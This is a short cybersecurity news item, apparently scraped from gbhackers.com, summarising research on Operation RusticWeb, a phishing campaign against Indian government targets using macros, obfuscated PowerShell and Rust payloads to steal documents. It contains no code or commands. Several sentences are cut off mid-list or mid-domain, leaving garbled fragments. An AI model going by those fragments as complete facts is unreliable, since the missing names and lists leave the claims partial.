Hackers use PowerShell commands because they provide a powerful scripting environment on Windows systems, allowing them to stealthily execute malicious scripts and commands called Operation RusticWeb.
The PowerShell's capabilities make it an attractive tool for gaining:-.
Cybersecurity researchers at SEQRITE Labs recently identified operation RusticWeb, in which they found threat actors using PowerShell commands to exfiltrate confidential documents.
The operation RusticWeb tracks overlapping tactics with Pakistan-linked APT groups like-.
While threat actors shift from compiled languages to the following languages for cross-compatibility and evasive tactics:-.
Golang malware examples include Windows-based Warp with Telegram bot C2 and Linux-based Ares RAT stager payload. Rust-based payloads in Operation RusticWeb use malicious shortcuts and a fake AWES domain for data exfiltration.
Spear-phishing targets victims with an archive file named 'IPR 2023-24,' triggering PowerShell to download scripts from rb[.
PowerShell script sets up paths for payload downloads and uploads.
The decoy PDF file extraction triggers Rust-compiled EXE payload execution.
New December payloads target Kailash Satyarthi Children's Foundation, indicating a focus on Indian government officials associated with children's foundations or societies.
In a December infection chain, maldocs were used with PowerShell scripts for enumeration and exfiltration, omitting Rust-based payloads.
Two fake domains and encrypted PowerShell scripts were involved.
Phishing maldoc initiates infection with a VBA macro containing obfuscated encrypted PowerShell commands.
Similar maldocs use modified PS commands, converting numbers to 'PoWeRSHEll' upon document opening.
PowerShell command decryption employs techniques akin to Emotet, with slight variations.
Obfuscation uses Invoke-Obfuscation techniques to mask the IEX command trigger.
Decrypted PowerShell commands download decoy files and next-stage script from domains, executing them in Downloads and Documents directories.
In the first scenario, the downloads occur from 'parichay.
In,' and in the second scenario, the fake domain mimics 'parichay.
New phishing hits the Indian government, stealing secrets via Rust payloads, encrypted PowerShell, and OshiUpload. Fake domains mimic government entities in the RusticWeb attack, possibly tied to the APT threat linked to Pakistan.
This Cyber News was published on gbhackers.com. Publication date: Sat, 23 Dec 2023 10:13:05 +0000